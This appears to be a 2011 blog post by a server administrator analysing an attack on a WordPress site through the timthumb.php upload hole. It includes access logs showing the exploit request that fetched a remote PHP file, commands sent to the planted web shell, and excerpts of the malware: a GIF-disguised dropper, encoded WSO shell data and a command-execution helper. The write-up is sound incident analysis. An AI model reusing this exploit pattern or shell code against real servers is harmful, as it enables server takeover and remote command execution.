I already wrote an article this week about the timthumb.php vulnerability which allows hackers to upload and execute files via Wordpress blogs.

Last time the hack took me by surprise, this time I was prepared. I set up a special monitoring for new processes and tonight the trap worked. At 20:06 a fake process was launched by www-data:

# ps auxf | grep www
root     16995  0.0  0.0  87856   716 pts/0    S+   21:00   0:00                      \_ grep www
www-data  7170  0.0  0.9 225316 40088 ?        S    14:06   0:00  \_ /usr/sbin/apache2 -k start
www-data 29483 14.5 10.4 1049984 419648 ?      Sl   17:37  29:36  \_ /usr/sbin/apache2 -k start
www-data  2594 14.3  9.0 1022848 366568 ?      Sl   18:30  21:24  \_ /usr/sbin/apache2 -k start
www-data  6318 11.5  9.0 1088992 364764 ?      Sl   19:13  12:19  \_ /usr/sbin/apache2 -k start
www-data 11256  0.0  0.0      0     0 ?        Z    20:06   0:00      \_ [sh]
www-data 11260 97.5  0.1  24592  5336 ?        R    20:06  52:26 /usr/sbin/httpd

After a quick research on access logs, I've found the following entries:

184.73.160.230 - - [12/Nov/2011:20:06:23 +0100] "GET / HTTP/1.1" 200 31358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Fire
fox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:27 +0100] "GET /wp-content/themes/DeepFocus/timthumb.php?src=http://picasa.com.thomaswdufour.com/patcherfinal.php HTTP/
1.1" 400 582 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=uname HTTP/1.1" 200
 139 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=backup HTTP/1.1" 20
0 66 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=check HTTP/1.1" 200
 135 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/inc.php HTTP/1.1" 200 126 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:40 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=patch HTTP/1.1" 200
 63 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

As soon as I saw the timthumb.php, the hack was immediately known to me. But this time it was a little bit different. In the last post only a command was executed, the uploaded php file was rather small. This time, the uploaded php file from source http://picasa.com.thomaswdufour.com/patcherfinal.php was rather big and even creates new sockets.

The file starts again with a binary code, like this:

GIF89a?????���!�????,???????D?;?// Coded [c] 2011 by v0ld3m0rt
// Unknown Indonesian H4xx0r
error_reporting(0);
$uname = php_uname();
$htaccess = "PEZpbGVzIH4gIlwuKHBocHxwaHAzfGNnaXxwaHA0fHBocDUpJCI+DQogIGRlbnkgZnJvbSBhbGwNCjwvRmlsZXM+";
$data = "PD9waHANCi8qIFdTTyAyLjEgKFdlYiBTaGVsbCBieSBvUmIpICovDQppZighZmlsZV9leGlzdH....

But the more interesting part comes at the end:

function ex($in) {
        $out = '';
        if(function_exists('exec')) {
                @exec($in,$out);
                $out = @join("\n",$out);
        }elseif(function_exists('passthru')) {
                ob_start();
                @passthru($in);
                $out = ob_get_clean();
        }elseif(function_exists('system')) {
                ob_start();
                @system($in);
                $out = ob_get_clean();
        }elseif(function_exists('shell_exec')) {
                $out = shell_exec($in);
        }elseif(is_resource($f = @popen($in,"r"))) {
                $out = "";
                while(!@feof($f))
                        $out .= fread($f,1024);
                pclose($f);
        }
        return $out;
}

function CreateFile($path, $content)
{
        $handle = fopen($path, "a+");
        fwrite($handle, $content);
        fclose($handle);
}

You can take a look at the full file here: external_patcherfinal.txt

The php script allows the hacker to execute commands on the server by using the functions passthru, system and shell_exec. But those functions are disabled on my server.
However by using the function popen, a forked command (in this case a bot) could be launched, which was executed just after the upload:

184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=infect&bot=[somebinarycode] HTTP/1.1" 200 49 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

Now it doesn't stop here. As one can see in the access log, another file 'inc.php' was as well accessed. If opened by browser, it looks like this:

The file  starts with the following code:

/* WSO 2.1 (Web Shell by oRb) */
if(!file_exists("data.php")) {
        WriteData();

Interesting, a php shell was uploaded. Let's take a look at it by modifying the password function:

And by using this web-shell, other files can be uploaded, executed, overwritten, and so on.

Two more files were found in the same directory: data.php and in the cache folder was a file called 'sex'. The 'sex'-file was actually a perl file which was then most probably executed by the shell. And this is the source of the fake Apache process discovered at first.